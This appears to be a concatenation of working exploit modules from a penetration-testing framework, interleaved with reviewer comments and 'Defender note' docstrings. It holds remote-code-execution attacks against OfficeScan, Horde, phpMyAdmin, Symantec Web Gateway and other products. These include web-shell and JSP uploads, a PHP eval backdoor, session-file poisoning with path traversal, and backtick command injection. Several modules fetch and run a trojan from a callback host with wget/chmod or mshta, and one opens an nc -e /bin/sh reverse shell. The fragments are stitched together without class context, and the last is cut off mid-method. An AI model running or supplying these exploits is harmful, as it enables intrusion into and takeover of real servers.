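
				reports_dir = self.exploitpath + "reports/"
				for ref in self.SelectedScan:
					data = self._fetch_nessus_report(ref)
					if data is None:
						continue

					# Created lazily so nothing is written when every
					# report was denied.
					if not os.path.exists(reports_dir):
						os.mkdir(reports_dir)

					# ref is a server-supplied reference; only "/" is
					# neutralised, matching the original behaviour.
					filename = reports_dir + ref.replace("/", "_")
					with open(filename, "w") as f:
						f.write(data)

					self.ReportFiles.append(filename)
					self.treestore_2.append(None, [filename])
			else:
				self.log("[D2 LOG] - No Nessus report selected")

		self.loaddlg.destroy()

	def _fetch_nessus_report(self, ref):
		"""Log in to the Nessus server and POST for one report.

		Args:
			ref: the report reference taken from the selected tree row.

		Returns:
			The response body, or None (after logging) when the server
			answers with its "not authorized" message.
		"""
		mainurl = "https://" + self.qhost + ":" + self.port
		UA = spkproxy.UserAgent(mainurl, exploit=self)

		login_data = urllib.urlencode({
			'login': self.login,
			'password': self.password,
			'submit': 'submit'
		})
		UA.POST(self.loginurl, data=login_data)

		report_data = urllib.urlencode({
			'report': ref,
			'submit': 'submit'
		})
		data = UA.POST(self.reporturl, data=report_data)

		if "you are not authorized to perform this request" in data.lower():
			self.log("[D2 LOG] Nessus ACCESS DENIED")
			return None
		return data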
    def run(self):
        """Find an upload path, POST the generated PHP file, request it and wait for the callback.

        Flow: for every ``jquery_path`` x ``vulpath`` combination the
        multipart body from ``self.getfile`` is POSTed (plain, then with a
        random trailing segment) until a 200 comes back. Then each
        ``upload_path`` + file name is requested and ``self.ISucceeded()``
        is polled once a second for five seconds.

        Returns:
            The last ``self.ISucceeded()`` result (truthy on callback), or 0
            when no path answered 200.
        """
        self.getargs()
        #test = self.test()
        # NOTE(review): the status lines here use self.hostname, the ones at
        # the end of the method use self.host -- they can differ when a
        # VHost is configured.
        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.hostname, self.port))
        logging.info("Attacking %s:%d" % (self.hostname, self.port))
        logging.info("VHost: %s" % self.hostname)

        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        # Optional HTTP basic auth, only when a user was supplied.
        auth = None
        if self.basicauth_user != "":
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)

        # Random 16-character name for the uploaded file; the commented
        # expression is a leftover alternative implementation.
        fname_shell = randomstring(
            16
        ) + ".php"  #''.join(random.choice(string.ascii_letters) for _ in range(16)) #
        fname_multipart_data = self.getfile(fname_shell)
        found_path = False
        useragentstring = ''
        vulnerable_path = ''
        for jquery_path in self.jquery_paths:
            # Base URL is rebuilt per iteration although it does not depend
            # on jquery_path.
            useragentstring = protocol + "://" + self.host + ":" + str(
                self.port) + "/" + self.basepath
            UA = spkproxy.UserAgent(useragentstring,
                                    auth=auth,
                                    hostname=self.hostname,
                                    exploit=self)
            for vulpath in self.vulnpaths:
                # Boundary must match the one used inside fname_multipart_data.
                UA.addHeader(
                    "Content-Type",
                    "multipart/form-data; boundary=---------------------------3922242971797626524322043819"
                )
                vulnerable_path = jquery_path + vulpath
                logging.info(
                    "Checking for vulnerable path: {}".format(useragentstring +
                                                              vulnerable_path))
                response, response_code = UA.POST(vulnerable_path,
                                                  fname_multipart_data,
                                                  return_response_code=True)
                if response_code == 200:
                    found_path = True
                    break

                # Second attempt with a random extra path segment.
                vulnerable_path = jquery_path + vulpath + "/" + randomstring(
                    10)
                logging.info(
                    "Checking for vulnerable path: {}".format(useragentstring +
                                                              vulnerable_path))
                response, response_code = UA.POST(vulnerable_path,
                                                  fname_multipart_data,
                                                  return_response_code=True)
                if response_code == 200:
                    found_path = True
                    break

            if found_path:
                logging.warning(
                    "Found vulnerable path: {}".format(useragentstring +
                                                       vulnerable_path))
                break

        # Wait for the upload
        time.sleep(3)
        ret = 0
        if found_path:
            # UA and jquery_path still hold the values from the iteration
            # that produced the 200 (both loops were left with break).
            UA.clearHeaders()
            for upload_path in self.upload_paths:
                test_path = jquery_path + upload_path + fname_shell
                logging.info("Triggering our uploaded callback: {}".format(
                    useragentstring + test_path))
                UA.GET(test_path, noresponse=True)
                for i in xrange(0, 5):  #wait five seconds for callback
                    time.sleep(1)
                    ret = self.ISucceeded()
                    if ret:
                        break

                if ret:
                    break

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))

        return ret
    def run(self):
        """Authenticate to the ``/officescan/console`` CGI and submit ``self.cmd`` through the widget proxy.

        Argument handling: host from the target; port, username and password
        from ``self.argsDict``. With an empty ``cmd`` the trojan mode uses an
        ``mshta.exe`` line pointing at the generated trojan served from a
        background HTTP server; otherwise the command's output is redirected
        into the ``d2`` file under ``repository/widgetPool`` and read back.

        Returns:
            0 when no LoginTicket is found or the authentication reply
            contains "unable"; otherwise 1 after the final POST.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            self.maketrojan()
            self.TROJANMODE = 1
            self.cmd = "mshta.exe http://" + self.callback.ip + "/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            # Output file path is relative to the widget directory requested
            # at the end of this method.
            self.cmd = "%s>repository/widgetPool/wp1/proxy/modTMCSS/d2" % self.argsDict.get(
                "cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        # self.protocol is read below but never assigned in this method --
        # presumably set elsewhere in the class; verify.
        ua = spkproxy.UserAgent("", exploit=self)
        ua.addHeader(
            "User-Agent",
            "Mozilla/5.0 (X11; Linux x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
        )

        # Init
        # Reply unused.
        url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0016"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        # Get LoginTicket
        # The reply is expected to contain a numeric "LoginTicket" field.
        url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0009"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        m = re.search('"LoginTicket" : ([0-9]+)', data)
        if m is None:
            self.log("[D2SEC] LoginTicket not found")
            return 0
        loginticket = m.group(1)

        # Create encrypted password
        # TMlogonEncrypted = sha256hex(md5hex(password) + LoginTicket).
        # NOTE(review): update() is given str -- Python 2 semantics (thread and
        # urllib.urlencode above imply the same); under Python 3 this needs bytes.
        m = hashlib.md5()
        m.update(self.password)
        md5 = m.hexdigest()
        txt = md5 + loginticket
        n = hashlib.sha256()
        n.update(txt)
        sha256 = n.hexdigest()

        # Authentication
        url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'TxtAccount': self.username,
            'TMlogonEncrypted': sha256
        })
        data = ua.POST(mainurl, params)
        # A reply containing "unable" is treated as a failed login.
        if "unable" in data:
            self.log("[D2SEC] Authentication error")
            return 0

        # Init cookies
        # Two GETs whose replies are unused; kept for the session state
        # they set up before the widget proxy call.
        url = "/officescan/console/html/cgi/cgiChkMasterPwd.exe?id=0010"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        url = "/officescan/console/html/widget/index.php"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        # Exploitation
        # The literal "D2 & " prefix in the T parameter is a fixed marker of
        # this exploit's requests.
        url = "/officescan/console/html/widget/proxy_controller.php"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'module': 'modTMCSS',
            'serverid': '1',
            'T': 'D2 & %s' % self.cmd
        })
        data = ua.POST(mainurl, params)
        self.log("[D2SEC] %s" % data)
        # Plain-command mode: read back the redirected output file. The
        # comparison assumes TROJANMODE starts at 0 (initialised elsewhere).
        if self.TROJANMODE == 0:
            url = "/officescan/console/html/widget/repository/widgetPool/wp1/proxy/modTMCSS/d2"
            mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port,
                                        url)
            data = ua.GET(mainurl)
            self.log("[D2SEC] %s" % data)

        return 1
    def run(self):
        """Two-stage request sequence against ``self.host``.

        Stage 1 posts to ``login.php`` and then to ``property_box.php`` with
        a crafted ``olist`` cookie; stage 2 fetches the PHP file named in
        ``eval_file`` with a base64 ``c`` query parameter and afterwards asks
        it to delete itself.

        Returns 1 when ``self.command`` was supplied, otherwise the value of
        ``self.ISucceeded()`` (polled three times, one second apart).

        Defender note: the ``uname=-...`` login POST, the ``olist`` cookie on
        the ``property_box.php`` POST and the later ``_xxxx_.php?c=<base64>``
        GETs are the artefacts this sequence leaves in web-server logs.
        """
        self.getArgs()

        # Base URL for every request below; always https on self.port.
        useragentstring = "https://" + self.host + ":%s" % self.port + "/"
        UA = spkproxy.UserAgent(useragentstring,
                                auth=None,
                                hostname=self.host,
                                exploit=self)

        self.log("WP> Sending Exploit Stage 1 - Authentication Bypass")
        data = UA.POST("login.php",
                       "button=Login&attempt=1&uname=-%s" % wp_randomstring(1),
                       extraheaders=None,
                       noresponse=False)

        # File name is "_" + four (presumably random) characters + "_.php".
        eval_file = "_" + wp_randomstring(4) + "_" + ".php"
        eval_code = wp_randomstring(
            1
        ) + "%26cmd%20/c%20echo%20\"%3c%3f%70%68%70%20%65%76%61%6c%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%24%5f%47%45%54%5b%63%5d%29%29%3b%20%3f%3e\">%20" + eval_file + "&dir"

        # The payload travels in the "olist" cookie, not in the POST body.
        UA.SetCookie("olist", eval_code)
        data = UA.POST("property_box.php",
                       "type=Dataset&objectname[]=%s" % (wp_randomstring(1)),
                       extraheaders=None,
                       noresponse=True)
        UA.ClearCookies()
        time.sleep(2)

        if self.command:
            command = "system(\"" + self.command + "\");"

            self.log("WP> Sending Exploit Stage 2 - Executing Command: %s" %
                     self.command)
            data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
                          noresponse=False)
            self.log(data)
            time.sleep(2)

            # Cleanup request: the dropped file is asked to delete itself.
            command = "system(\"del /Q /F " + eval_file + "\");"
            data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
                          noresponse=False)

            ret = 1
        else:
            command = self.get_php_to_mosdef().strip()

            self.log("WP> Sending Exploit Stage 2: Payload\n")
            data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
                          noresponse=True)
            time.sleep(2)

            # Same cleanup request as in the command branch.
            command = "system(\"del /Q /F " + eval_file + "\");"
            data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
                          noresponse=False)

            # Poll ISucceeded() up to three times; ret is always bound because
            # the loop body runs at least once.
            for i in xrange(0, 3):
                time.sleep(1)
                ret = self.ISucceeded()
                if ret:
                    break
            if not ret:
                self.log("WP> Did not succeed in getting a connectback")
        if ret:
            self.setInfo("WP> %s attacking %s:%d - completed (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                         (NAME, self.host, self.port))
        return ret
    def upload_file(self):
        """Authenticate, upload the JSP in ``self.filename`` and request it.

        Steps: form login via ``/j_security_check``, scrape ``apiKey`` from
        ``/apiclient/ember/index.jsp``, multipart POST of the file to
        ``/api/json/dashboard/addPost``, then GET
        ``/itplus/FileStorage/<post_id>/d2.jsp``.

        Returns 1 on completion, 0 when the apiKey or post_id cannot be
        found in the responses.

        Defender note: a ``d2.jsp`` upload through ``addPost`` followed by a
        GET under ``/itplus/FileStorage/`` is the log pattern to alert on;
        restricting upload types and serving storage as non-executable
        content removes the execution step.
        """
        # Open JSP file
        # NOTE(review): not a context manager — the handle leaks if read()
        # raises.  Logic kept as-is.
        f = open(self.filename, "r")
        fdata = f.read()
        f.close()

        # Placeholders in the template are replaced with callback details.
        fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
        fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))

        ua = spkproxy.UserAgent("", exploit=self)

        # Authentication
        url = '/'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        url = '/j_security_check'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'AUTHRULE_NAME': 'Authenticator',
            'clienttype': 'html',
            'ScreenWidth': '1920',
            'ScreenHeight': '932',
            'loginFromCookieData': '',
            'ntlmv2': 'false',
            'j_username': self.username,
            'j_password': self.password,
            'signInAutomatically': 'on',
            'uname': ''
        })
        # Login result is not checked; a failed login surfaces later as a
        # missing apiKey.
        data = ua.POST(mainurl, params)

        # Get apiKey
        url = '/'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        url = '/apiclient/ember/index.jsp'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)
        m = re.search('window.OPM.apiKey = "([^\"]+)";', data)
        if m is None:
            self.log("[D2SEC] - apiKey not found")
            return 0

        # Upload JSP file
        # Hand-built multipart body; the boundary string here must match the
        # one in the Content-Type header set below.
        params = '-----------------880735062871553\r\nContent-Disposition: form-data; name="post"\r\n\r\nd2\r\n-----------------880735062871553\r\nContent-Disposition: form-data; name="[object HTMLInputElement]i"; filename="d2.jsp"\r\nContent-Type: text/plain\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------880735062871553--\r\n' % (
            len(fdata), fdata)
        url = '/api/json/dashboard/addPost?apiKey=%s&groupID=0' % m.group(1)
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        ua.addHeader(
            "Content-Type",
            "multipart/form-data; boundary=---------------880735062871553")
        data = ua.POST(mainurl, params)
        m = re.search('"post_id":"([^\"]+)"', data)
        if m is None:
            self.log("[D2SEC] - post_id not found")
            return 0

        # Execute uploaded JSP file
        url = "/itplus/FileStorage/%s/d2.jsp" % m.group(1)
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        return 1
    def run(self):
        """Send the ``href`` cookie to ``services/javascript.php``.

        Two modes: when ``self.command`` is set, the command result is
        scraped from the ``link.href = '#`` fragment of the response and
        0/1 is returned; otherwise a TCP listener is opened on
        ``self.rcv_port``, the request is sent with ``noresponse=True``, and
        an accepted connection is wrapped in a ``unixShellNode`` which is
        returned (0 on any failure).

        Defender note: the ``href`` cookie carrying a ``system:`` prefix on
        a POST to ``<hordepath>/services/javascript.php`` is the request
        artefact; in the second mode an outbound TCP connection from the web
        host to ``self.callback.ip`` follows.
        """
        self.getArgs()

        useragentstring = "http://" + self.host + ":%s" % self.port + "/"
        UA = spkproxy.UserAgent(useragentstring,
                                auth=None,
                                hostname=self.host,
                                exploit=self)

        ret = 0
        if self.command:
            self.log("WP> Executing Command: %s" % self.command)
            self.log("WP> Sending Exploit")
            UA.SetCookie("href", "system:" + self.command)
            data = UA.POST("%s/services/javascript.php" % self.hordepath,
                           "app=%s&file=open_calendar.js" % (self.hordeapp),
                           extraheaders=None,
                           noresponse=False)
            # Scan the response byte-by-byte for the marker; every match
            # whose next two chars are not "';" is logged as a result.
            lhref = 'link.href = \'#'
            for i in range(len(data)):
                if lhref in data[i:i + len(lhref)]:
                    if not '\';' in data[i + len(lhref):i + len(lhref) + 2]:
                        result = data[i + len(lhref):data.
                                      find('\n\';', (i + len(lhref)))]
                        ret = 1
                        self.log("WP> Command Result:\n%s\r\n " %
                                 prettyprint(result))
            time.sleep(2)

            if ret:
                self.setInfo("WP> %s attacking %s:%d - completed (success!)" %
                             (NAME, self.host, self.port))
            else:
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                             (NAME, self.host, self.port))
            return ret
        else:
            # gettcplistener() returns 0 (not None) on failure.
            lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
            if lsock == 0:
                self.log("WP> Unable to list on port %d" % self.rcv_port)
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                             (NAME, self.host, self.port))
                return 0
            self.log("WP> Listening on port %d" % self.rcv_port)

            self.log("WP> Sending Exploit")
            #  nc -n ip port -e /bin/sh \&\n
            UA.SetCookie(
                "href",
                "system:nc -n " + self.callback.ip + " " + str(self.rcv_port) +
                "%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e")
            data = UA.POST("%s/services/javascript.php" % self.hordepath,
                           "app=%s&file=open_calendar.js" % (self.hordeapp),
                           extraheaders=None,
                           noresponse=True)

            self.log("WP> Awaiting connectback")
            lsock.set_timeout(30)
            # NOTE(review): bare except also swallows KeyboardInterrupt;
            # kept as-is.
            try:
                (s2, addr) = lsock.accept()
                s2.set_timeout(2)
            except:
                self.log("WP> Connectback failed")
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                             (NAME, self.host, self.port))
                return 0

            telnetshell = Telnet()
            telnetshell.sock = s2
            try:
                shell = shelllistener(shellfromtelnet(telnetshell),
                                      logfunction=self.logfunction,
                                      simpleShell=1)
            except:
                self.log("WP> Shell listener failed - connection closed")
                self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                             (NAME, self.host, self.port))
                return 0

            node = unixShellNode()
            node.parentnode = self.argsDict["passednodes"][0]
            node.shell = shell

            self.setInfo("WP> %s attacking %s:%d - completed" %
                         (NAME, self.host, self.port))
            # Unlike the command branch this returns the node object, so
            # callers must treat the return value as "0 or node".
            return node
    def run(self):
        """Log in, fetch a CSRFGuardToken, then POST ``SSHConfig.jsp``.

        The ``SSHPort`` field is sent wrapped in backticks around
        ``self.cmd``; ``self.cmd`` is always the wget/chmod/run string built
        below and an HTTP server thread is started to serve
        ``self.trojanname``.

        Returns 0 when the token is not found.  The ``while 1`` loop after
        the final POST never exits, so ``return 1`` is unreachable.

        Defender note: a POST to ``/SSHConfig.jsp`` whose ``SSHPort`` value
        is non-numeric (contains backticks) is the request to alert on;
        server-side validation of that field as an integer is the fix.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        # No "cmd" argument is consulted here, unlike sibling modules.
        self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)

        # Authentication
        url = '/logon.jsp'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        url = '/uilogonsubmit.jsp'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'wherefrom': '',
            'wronglogon': 'no',
            'pwd': 'Log On',
            'uid': self.username,
            'passwd': self.password
        })
        # Login response is not inspected; failure shows up as a missing token.
        data = ua.POST(mainurl, params)

        # Get CSRFGuardToken
        url = '/top.jsp'
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        # entireresponse=True: headers are included, which is why the regex
        # below is a bytes pattern.
        data = ua.GET(mainurl, entireresponse=True)
        m = re.search(b'CSRFGuardToken=([^\"]+)', data)
        if m is None:
            self.log("[D2SEC] - Token not found")
            return 0
        token = m.group(1)
        self.log("[D2SEC] - CSRFGuardToken=%s" % token)

        # Exploitation
        """                                
        url = "/servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add"            
    	mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)    	                	
    	params = urllib.urlencode({'CSRFGuardToken':token, 'op':'sroutemanage', 'fromurl':'/staticRoutes.jsp', 'failoverurl':'/staticRoutes.jsp', 'port':'', 'oldnetid':'', 'oldrouter':'', 'oldnetmask':'', 'oldport':'', 'netid':'192.168.1.0', 'netmask':'255.255.255.0', 'router':'192.168.1.1', 'interface_vlanid_sel':'eth1`%s`'%self.cmd})
    	buff = ua.POST(mainurl, params)
        """
        url = "/SSHConfig.jsp"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'CSRFGuardToken': token,
            'needSSHConfigure': 'yes',
            'SSHStatus': 'enable',
            'SSHPort': '`%s`' % self.cmd,
            'op': 'save',
            'cbSSHStatus': 'enable',
            'btSSHPort': '221'
        })
        buff = ua.POST(mainurl, params)

        # Keeps the HTTP server thread alive indefinitely; never returns.
        while 1:
            time.sleep(1)

        return 1
    def run(self):
        """Poison the PHP session file via ``langChoice`` and include it.

        Flow: optional ``self.test()`` when ``self.version == 0``, GET
        ``index.php`` to obtain a ``PHPSESSID`` cookie, POST a ``langChoice``
        value containing PHP code (stored in the session), then POST
        ``langChoice=../../.../tmp/sess_<PHPSESSID>`` so the session file is
        included.  Returns 1/0 (or the result of ``ISucceeded()`` in the
        connectback branch).

        Defender note: a ``langChoice`` value with ``../`` traversal or
        ``<?`` is the request artefact; whitelisting ``langChoice`` against
        the installed language list blocks both steps.
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))

        if self.version == 0:
            ret = self.test()
            if not ret:
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        # Note: no ":port" in this base URL, unlike sibling modules.
        UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" +
                                self.basepath,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)
        self.log("Getting index.php to grab our cookie")
        data = UA.GET("index.php")
        self.log("Data=%s" % data)

        if self.command:
            self.log("Command: %s" % self.command)
            phpsessid = UA.cookies.get("PHPSESSID")
            if not phpsessid:
                self.log("Failed to see a php session id!")
                self.log("Cookies=%s" % repr(UA.cookies))
                return 0
            command = self.command
            self.log("Sending Exploit Reply")
            fields = {}

            # Trailing "\00" terminates the string server-side.
            fields[
                "langChoice"] = "<? print(\"startz\");passthru(stripslashes(\"" + command + "\"));print(\"endz\");?>\00"

            data = UA.POST("index.php", fields)
            expl = UA.POST(
                "index.php",
                "langChoice=../../../../../../../../../../../../../../tmp/sess_"
                + phpsessid + "\00")
            #self.log("Data=%s"%data)

            # NOTE(review): "startz"/"endz" are searched in `data` (the first
            # POST), not in `expl` (the include request) — verify intent.
            if "startz" in data:
                result = data.split("startz")[1].split("endz")[0]
                #self.log("Command data: %s"%prettyprint(data))
                self.log("Command result=%s" % prettyprint(result))
                ret = 1
            else:
                # NOTE(review): `ret` is left unassigned here when
                # self.version != 0, so the `if ret:` below would raise
                # UnboundLocalError.
                self.log("Command not run - service patched?!")
        else:
            command = "<?" + self.get_php_to_mosdef().strip() + "?>\00"
            phpsessid = UA.cookies.get("PHPSESSID")
            if not phpsessid:
                self.log("Failed to see a php session id!")
                self.log("Cookies=%s" % repr(UA.cookies))
                return 0
            #command=command.replace("/","`pwd|cut -b1`")
            self.log("Command: %s" % command)
            self.log("Sending Exploit Reply")

            fields = {}
            fields["langChoice"] = command

            data = UA.POST("index.php", fields)
            expl = UA.POST(
                "index.php",
                "langChoice=../../../../../../../../../../../../../../tmp/sess_"
                + phpsessid + "\00")
            self.log("Data=%s" % data)
            self.log("Looking for PHP connectback")
            ret = self.ISucceeded()

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret
    def run(self):
        """Write PHP into the config file through the setup script.

        Flow: GET ``self.setupfile`` and scrape the hidden ``token`` field;
        POST a serialized ``configuration`` string (``action=save``) that
        embeds ``command``; then GET ``self.configfile`` with ``s=<base64>``
        and poll ``ISucceeded()`` three times.  Returns the last
        ``ISucceeded()`` value, 0 if no token was found.

        Defender note: a POST to the setup script with ``action=save`` and a
        ``configuration`` value containing ``eval(`` / ``base64_decode(`` is
        the artefact; the usual mitigation is removing or access-restricting
        the setup script after installation.
        """
        self.getargs()
        #test = self.test()
        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.hostname, self.port))

        self.log("Attacking %s:%d" % (self.hostname, self.port))
        #self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user != "":
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
        self.log("useragentstring: %s" % useragentstring)

        UA = spkproxy.UserAgent(useragentstring,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)
        response = UA.GET(self.setupfile)
        #<input type="hidden" name="token" value="aa96b8c97b4908d5cddcdcdddc83d211" />
        # Token is located by whitespace-splitting the page and taking the
        # word after 'name="token"'; list.index raises ValueError when absent.
        response = response.split(" ")
        try:
            tokenpos = response.index("name=\"token\"")
            token = response[tokenpos + 1].strip("\"").strip("value=\"")
            self.log("Found valid token to use: %s" % token)
        except ValueError:
            self.log("No usable token found.  Will not proceed with attack")
            return 0

        #manually encoded this stuff because urllib.quote_plus was having a bad day ...
        command = """:%22host%27%5d=%27%27%3b%20if($_GET%5b%27s%27%5d){eval(base64_decode($_GET%5b%27s%27%5d))%3b}%3b"""
        # Length of the decoded string is what the serialized "s:<len>:" needs.
        commandlen = len(urllib.unquote(command))

        poststuff = """token=%s&action=save&configuration=a:1:{s:7:%%22Servers%%22%%3ba:1:{i:0%%3ba:6:{s:%s%s//%%22%%3bs:9:%%22localhost%%22%%3bs:9:%%22extension%%22%%3bs:6:%%22mysqli%%22%%3bs:12:%%22connect_type%%22%%3bs:3:%%22tcp%%22%%3bs:8:%%22compress%%22%%3bb:0%%3bs:9:%%22auth_type%%22%%3bs:6:%%22config%%22%%3bs:4:%%22user%%22%%3bs:4:%%22root%%22%%3b}}}&eoltype=unix""" % (
            token, commandlen, command)
        #push the eval() code into the config.inc.php file
        response = UA.POST(self.setupfile, poststuff, noresponse=False)

        #get a shell!
        response = UA.GET(
            self.configfile +
            "?s=%s" % b64encode(self.get_php_to_mosdef()).strip(),
            noresponse=True)

        for i in xrange(0, 3):  #wait three seconds for callback
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret
    def run(self):
        """Log in to ``/spywall/`` and submit a backtick-wrapped ``white_ip``.

        Flow: POST credentials to ``/spywall/login.php``; POST
        ``/spywall/new_whitelist.php`` with ``white_ip`` set to
        ``d2`<cmd> > cleaner/d2```; GET ``/spywall/cleaner/d2`` to read the
        command output.  With no ``cmd`` argument the command is the
        wget/chmod/run string for ``self.trojanname`` and the method then
        sleeps forever; otherwise the output is logged and 1 returned.
        Returns 0 on login failure or when the output file is 404.

        Defender note: a ``white_ip`` value that is not an IP address (here
        it contains backticks and ``>``) and a subsequent GET of
        ``/spywall/cleaner/d2`` are the log artefacts; strict IP validation
        of ``white_ip`` is the mitigation.
        """
        # Check arguments
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))
        self.username = self.argsDict.get("username", self.username)
        self.password = self.argsDict.get("password", self.password)

        if (self.argsDict.get("cmd", self.cmd) == ""):
            self.TROJANMODE = 1
            self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
            thread.start_new_thread(self.startHTTPServer, ())
        else:
            self.cmd = self.argsDict.get("cmd", self.cmd)

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))
        self.log("Attacking %s:%d" % (self.host, self.port))

        ua = spkproxy.UserAgent("", exploit=self)

        # Authentication
        url = "/spywall/login.php"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'loginBtn': 'Login',
            'target': '/spywall/executive_summary.php',
            'section': '',
            'USERNAME': self.username,
            'PASSWORD': self.password
        })
        data = ua.POST(mainurl, params)

        # A response that still references login.php is treated as a failed login.
        if "login.php" in data:
            self.log('[D2SEC] Authentication error')
            return 0

    # Exploitation
        # Output is redirected to cleaner/d2, relative to the web root.
        self.cmd = 'd2`%s > cleaner/d2`' % self.cmd
        url = "/spywall/new_whitelist.php"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        params = urllib.urlencode({
            'applianceid': '1',
            'sid': '1',
            'oldUrl': '',
            'isNew': '1',
            'white_ip': self.cmd,
            'whitelist': '1',
            'ignore_auth': '0',
            'white_comment': ''
        })
        data = ua.POST(mainurl, params)

        url = "/spywall/cleaner/d2"
        mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
        data = ua.GET(mainurl)

        if '404 Not Found' in data:
            self.log('[D2SEC] No valid session id found')
            return 0

